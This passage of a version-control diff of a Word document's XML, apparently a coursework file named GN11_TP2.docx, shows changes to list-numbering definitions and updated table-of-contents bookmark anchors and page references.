+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="2520"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="47F07EF2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="CFC2DA9A"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6B417DE9"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="214261B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="2520"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="72FC769C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2D4C0DE4"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="77C20D83"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="214261B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="2520"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7F801B08"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="214261B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="2520"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="415831203">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="700980505">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1234974110">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="258218542">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="924727896">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="577444158">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="615798303">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="522520348">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="982738391">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="1492603585">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="180096674">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="48235752">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1655260437">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="1292128633">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="1473404762">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="700980505">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="3" w16cid:durableId="1234974110">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="4" w16cid:durableId="258218542">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="924727896">
-    <w:abstractNumId w:val="0"/>
+  <w:num w:numId="16" w16cid:durableId="514851648">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>
@@ -6886,6 +10469,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="009D3650"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>

--- a/TP2/GN11_TP2.docx
+++ b/TP2/GN11_TP2.docx
@@ -370,7 +370,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc213030668" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038589" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -399,7 +399,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030668 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038589 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -446,7 +446,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030669" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038590" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -506,7 +506,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030669 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038590 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -553,7 +553,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030670" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038591" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -602,7 +602,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030670 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038591 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -649,7 +649,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030671" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038592" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -698,7 +698,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030671 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038592 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -745,7 +745,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030672" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038593" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -794,7 +794,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030672 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038593 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -841,7 +841,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030673" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038594" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -890,7 +890,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030673 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038594 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -937,7 +937,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030674" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038595" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -986,7 +986,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030674 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038595 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1033,7 +1033,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030675" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038596" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1082,7 +1082,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030675 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038596 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1129,7 +1129,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030676" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038597" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1178,7 +1178,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030676 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038597 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1198,7 +1198,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1225,7 +1225,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030677" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038598" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1274,7 +1274,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030677 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038598 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1321,7 +1321,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030678" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038599" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1370,7 +1370,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030678 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038599 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1417,7 +1417,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030679" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038600" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1466,7 +1466,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030679 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038600 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1513,7 +1513,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc213030680" w:history="1">
+          <w:hyperlink w:anchor="_Toc213038601" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1521,7 +1521,7 @@
                 <w:noProof/>
                 <w:lang w:val="pt-PT"/>
               </w:rPr>
-              <w:t>1.1.1.</w:t>
+              <w:t>2.2.2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1562,7 +1562,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
